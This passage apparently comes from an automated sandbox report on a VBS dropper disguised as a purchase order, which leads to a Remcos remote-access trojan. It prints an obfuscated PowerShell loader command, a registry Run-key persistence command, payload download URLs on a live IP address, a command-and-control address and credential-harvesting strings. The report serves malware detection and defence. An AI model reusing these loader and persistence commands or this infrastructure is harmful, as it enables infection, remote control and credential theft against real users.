              • 0xe108:$e4: Get-Process
              • 0xe160:$e4: Start-Process
              • 0x17f8e:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs", CommandLine|base64offset|contains: 4E, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs", ProcessId: 1612, ProcessName: wscript.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7444, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", ProcessId: 7520, ProcessName: cmd.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nuchale
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", ProcessId: 7572, ProcessName: reg.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7444, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)", ProcessId: 7520, ProcessName: cmd.exe
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nuchale
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs", CommandLine|base64offset|contains: 4E, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs", ProcessId: 1612, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRug

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7444, TargetFilename: C:\ProgramData\remcos\logs.dat
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: paygateme.netVirustotal: Detection: 19%Perma Link
              Source: http://87.121.105.184/sviLEH127.binVirustotal: Detection: 18%Perma Link
              Source: http://87.121.105.184/Udvejningernes.aafVirustotal: Detection: 16%Perma Link
              Source: Yara matchFile source: 00000009.00000003.2333650972.0000000006604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2321744797.00000000071A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2318647454.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbj source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000005.00000002.2321744797.00000000071A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb= source: powershell.exe, 00000005.00000002.2321744797.0000000007177000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WCN\en-GB\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\Jump to behavior

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficTCP traffic: 192.168.2.4:49740 -> 146.70.57.34:2286
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 87.121.105.184 87.121.105.184
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewIP Address: 146.70.57.34 146.70.57.34
              Source: global trafficHTTP traffic detected: GET /Udvejningernes.aaf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /sviLEH127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.184
              Source: global trafficHTTP traffic detected: GET /Udvejningernes.aaf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /sviLEH127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.184Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000D.00000003.2478450664.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478641943.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2479677849.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000D.00000003.2478450664.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478641943.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2479677849.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: paygateme.net
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: powershell.exe, 00000001.00000002.2525142597.000002B7A85E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2525142597.000002B7AA384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.184
              Source: powershell.exe, 00000001.00000002.2525142597.000002B7A83F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.184/Udvejningernes.aafP
              Source: powershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.184/Udvejningernes.aafXR
              Source: powershell.exe, 00000001.00000002.2525142597.000002B7AA384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
              Source: wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE88A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
              Source: wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE88A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
              Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
              Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
              Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
              Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
              Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
              Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
